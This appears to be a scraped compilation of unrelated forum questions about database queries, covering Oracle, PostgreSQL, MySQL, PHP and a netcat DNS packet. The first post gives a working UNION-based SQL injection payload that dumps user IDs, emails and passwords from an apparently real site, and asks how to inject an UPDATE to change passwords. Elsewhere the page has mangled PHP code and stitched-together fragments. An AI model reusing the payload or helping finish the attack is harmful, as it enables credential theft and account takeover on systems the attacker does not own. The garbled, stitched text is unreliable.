SQL Injection update query

I have a sqli and i can dump data from the DB with the query below func=REC&lastid=7491&start=3&uid=56+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat(uid,':',email,':',password) FROM user WHERE uid=56; --&token=6eadee0862e6fe05d588cb29c416d9

How can i add an update query to change the password? I’ve tried the query below but it did’t work

func=REC&lastid=7491&start=3&uid=56+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,UPDATE users SET password='xxxxxxx'; --&token=6eadee0862e6fe05d588cb29c416d9 

Is there a better way of displaying ‘Count’ of records beside other columns in a select query?

I have a table with below structure :

Test1(c_num  number ,c_first_name varchar2(50), c_last_name varchar2(50)) 

1)There is a normal index on c_num column.

2)The table has nearly 5 million records.

I have a procedure as you can see below. I want to display the Count(*) along with other columns.I want to know if there are better ways of doing this so that we can have better performance.

create or replace procedure get_members(o_result out sys_refcursor)    is begin  open o_result for   select c_num,          c_first_name,          c_last_name,          (select count(*) from test1) members_cnt -->Is there a better way instead of doing this?   from test1;  end; 

Thanks in advance

Fast query on the number of elements in a quarter plane

I have a scatter of 2D elements on a 2D plane.

I would like an efficient algorithm to prepare and query the number of points in a quarter plane (inclusive of boundary).

The quarter plane is defined by a point $ (x,y)$ . All elements $ (x’, y’)$ where $ x<=x’$ and $ y<=y’$ are in the quarter plane.

For example

  • I have elements [(1,1), (2,2), (1,2), (3,2)],
  • My queries are [(1,1), (2,2), (3,3)]

The program should return [1,3,4].

This is for a past competitive programming challenge (WiFi Network problem in this competition)

Is there a query language variant of Turing Completeness?

By this I mean a theory where you can say Language X is Query Complete so that you know that language is able to do any sort of query? I’m guessing not because some queries would run into things that a language would have to be Turing complete to work?

Why do I wonder – well you might have a relational database and a graph database and someone might say anything that can be done in the relational database can be done in the graph database (albeit at different speeds) so I would like if there were some terms DB A and DB B are both Query Complete – or if not that if there was a way to categorize levels of "query completeness" (I’m just going to assume my ill defined concept is totally understandable to everyone) so one can say stuff like "DB A is query level 4 but DB B is at query level 3, but of course much faster because of those limitations."

I sure hope (so as to not feel like a bigger idiot than normal) that the answer to this question isn’t just a flat No.

How to use ‘Bind Variables’ in a ‘Dynamic Query ‘ when the exact number of variables are not known

I have a procedure in which I’m using Dynamic SQL. The input parameteri_tables is a string which is a concatenation of the name of some tables . It might be one these :

1)All tables test_table1,test_table2,test_table3.

2)Only two tables , for instance test_table2,test_table3 .

3)Nothing .So NULL will pass to the procedure.

I’ve read about Bind variable and the significant role it has in preventing injection and improving performance. I want to use bind variable in my procedure but there is one things I don’t know how to handle :

As you can see we do not know the exact number of variables.It might be one , two , three or nothing. Depending on The input parameteri_tables.

   create or replace procedure bind_variable_test(i_tables varchar2,                                                   i_cid    number,                                                   o_result out sys_refcursor) is     actual_query varchar2(1000) := '';    begin         -- this is the base query     actual_query := 'select *                 from z_test_a t1                   inner join z_test_b t2                 on t1.id = t2.id';      -- check input parameter " i_tables "       if i_tables like '%test_table1%' then              actual_query := actual_query || '  inner join test_table1 t3 on t3.id = t1.id and                              t3.cid = ' || i_cid;      end if;       if i_tables like '%test_table2%' then             actual_query := actual_query || '  inner join test_table2 t4 on t4.id = t1.id and                              t4.cid = ' || i_cid;      end if;       if i_tables like '%test_table3%' then             actual_query := actual_query || '  inner join test_table3 t5 on t5.id = t1.id and                    t5.cid = ' || i_cid;      end if;      open o_result for actual_query;     end; 

Create DNS query with Netcat or /dev/udp/ [closed]

I’m trying to send a valid DNS request with either nc or bash and /dev/udp/.

I created a valid DNS packet to use as a template:

tcpdump -XX port 53 

Then, in a new terminal made a request with curl:

curl https://duckduckgo.com/ 

This generates the following data in the tcpdump terminal.

    0x0000:  4500 003c b0b4 4000 4011 73c3 0a00 020f  E..<..@.@.s.....     0x0010:  0a2a 0001 bdd4 0035 0028 4f24 cfc9 0100  .*.....5.(O$  ....     0x0020:  0001 0000 0000 0000 0a64 7563 6b64 7563  .........duckduc     0x0030:  6b67 6f03 636f 6d00 0001 0001            kgo.com..... 

From this, I modified the request slightly to match this reference and saved it to a file /tmp/ddg.txt.

0000:  4500 003c b0b4 4000 4011 73c3 0a00 020f  E..<..@.@.s..... 0010:  0a2a 0001 bdd4 0035 0028 4f24 cfc9 0100  .*.....5.(O$  .... 0020:  0001 0000 0000 0000 0a64 7563 6b64 7563  .........duckduc 0030:  6b67 6f03 636f 6d00 0001 0001            kgo.com..... 

Then, tried generating a request, but I get the following error message:

xxd -r /tmp/ddg.txt | nc -q 1 -nu 10.42.0.1 53 xxd: sorry, cannot seek backwards. 

In Wireshark, the request appears malformed. What am I getting wrong here? It is possible to send a proper DNS query with this method?

enter image description here

How to increase the query performance on my fts query?

I’m pretty new to database world and I have the following table:

                        Table "public.so_rum"   Column   |          Type           | Collation | Nullable | Default  -----------+-------------------------+-----------+----------+---------  id        | integer                 |           |          |   title     | character varying(1000) |           |          |   posts     | text                    |           |          |   body      | tsvector                |           |          |   parent_id | integer                 |           |          |  Indexes:     "so_rum_body_idx" rum (body) 

I have dumped around 27M record. And I wanted to perform a full text search on my posts. body is a tsvector for posts and it is rum indexed.

However, when I run FTS, it is taking a long time. For example:

 EXPLAIN ANALYZE select count(*) from so_rum     where body @@ plainto_tsquery('english','not fast enough data is slow much') 

give back:

                                                                 QUERY PLAN                                                                  --------------------------------------------------------------------------------------------------------------------------------------------  Aggregate  (cost=188.01..188.02 rows=1 width=8) (actual time=42207.386..42207.387 rows=1 loops=1)    ->  Index Scan using so_rum_body_idx on so_rum  (cost=180.00..188.01 rows=1 width=0) (actual time=34716.047..42206.555 rows=497 loops=1)          Index Cond: (body @@ '''fast'' & ''enough'' & ''data'' & ''slow'' & ''much'''::tsquery)  Planning Time: 0.247 ms  Execution Time: 42208.211 ms (5 rows) 

Another similar query, but fetching post this time:

EXPLAIN ANALYZE select posts from so_rum     where body @@ plainto_tsquery('english',' why java type casting is throwing the exception? How to solve it') ;                                                               QUERY PLAN                                                                ---------------------------------------------------------------------------------------------------------------------------------------  Index Scan using so_rum_body_idx on so_rum  (cost=216.00..224.01 rows=1 width=614) (actual time=45155.186..45516.358 rows=31 loops=1)    Index Cond: (body @@ '''java'' & ''type'' & ''cast'' & ''throw'' & ''except'' & ''solv'''::tsquery)  Planning Time: 19.540 ms  Execution Time: 45517.985 ms (4 rows) 

How to reduce the query time here? What mistake I’m doing here?

MySQL query is very slow (15 minutes)

I was previously using SQLite for a personal project and due to a constraint of having it available online, I decided to make the switch to MySQL. I converted my database to the MySQL equivalent but I just noticed that performance is VERY poor. This is a 70 mb database with around 600k records total. The query I am running is an INNER JOIN that executes in less than 500 ms using SQLite but the same query using MySQL takes 15 minutes.

SELECT has.tag_id, has.image_id FROM has INNER JOIN image ON image.image_id = has.image_id INNER JOIN person ON person.person_id = image.person_id WHERE person.name="Random Person" 
  • has table has 80k records
  • image table has 290k records
  • person table has 500 records

Here is the structure of the three tables:

create table media.person (     person_id int auto_increment         primary key,     name         text not null )     collate = utf8_unicode_ci;  create table media.image (     id           int auto_increment,     image_id     int  not null,     person_id int  not null,     link         text not null,     checksum     text null,     constraint id         unique (id) )     collate = utf8_unicode_ci;  alter table media.image     add primary key (id);  create table media.has (     id       int auto_increment         primary key,     tag_id   int not null,     image_id int not null )     collate = utf8_unicode_ci; 

Note that I added a primary key to the has table because I suspected it might have been the source of the problem, but it isn’t and SQLite was doing fine without that primary key.

The database uses the InnoDB engine. Here is the output of the mysql --version command:

mysql Ver 14.14 Distrib 5.7.30 

Where could the problem come from? I can understand a small loss of performance because MySQL is heavier than SQLite but certainly not to the point of going from 500 ms to 15 minutes for such a simple query.

How to chang this query from PDO to SQLi?

I am trying to get user’s information and show them in user’s profile. And i found this query but it is in PDO and my work is in sqli here the query if(isset($ _SESSION[‘user’])){ $ getuser=$ con->prepare("SELECT * From users where username=?"); $ getuser->execute(array($ sessionuser)); Sinfo=$ getuser->fetch();

And here the whole code

prepare(“SELECT * From users where username=?”); $ getuser->execute(array($ sessionuser)); Sinfo=$ getuser->fetch(); ?> Username: Email: Register Date: Password:

Create dynamic sql query to select all related data in DB based on entry table and ID

Hope all is well. I am hoping you can help me.

Problem Statement – I’m tasked to create a dynamic SQL statement which will select all related data from a given table where the Identifier is passed. For each table where the relevant data is found i would like the data to be exported onto a separate tab of within excel

If i was doing this manually done this i would perform the following queries and export the data onto each tab;

Select * from  Mason where id = 12345 Select * from  MasonContacts where Companyid= 12345  Select * from  MasonOpportunities  where Comid = 12345  

However given the sheer volume of tables this isn’t viable.

Step 1 : Type in my identifier (in this case my identifier is a field called "Id" in the Table "Mason") The query will always start from this table.

Table Name : Mason Field : Id = "12345"

Step 2 : Search against table "MasonContacts", search against the field "Companyid". Return all columns & records where the field "Companyid = 12345"

Table Name : MasonContacts Field : Companyid

Step 3 : Search against table "Mason Opportunities ", search against the field "Comid". Return all columns & records where the field "Company = 12345"

Table Name : MasonOpportunities Field : Comid

Looking forward to your help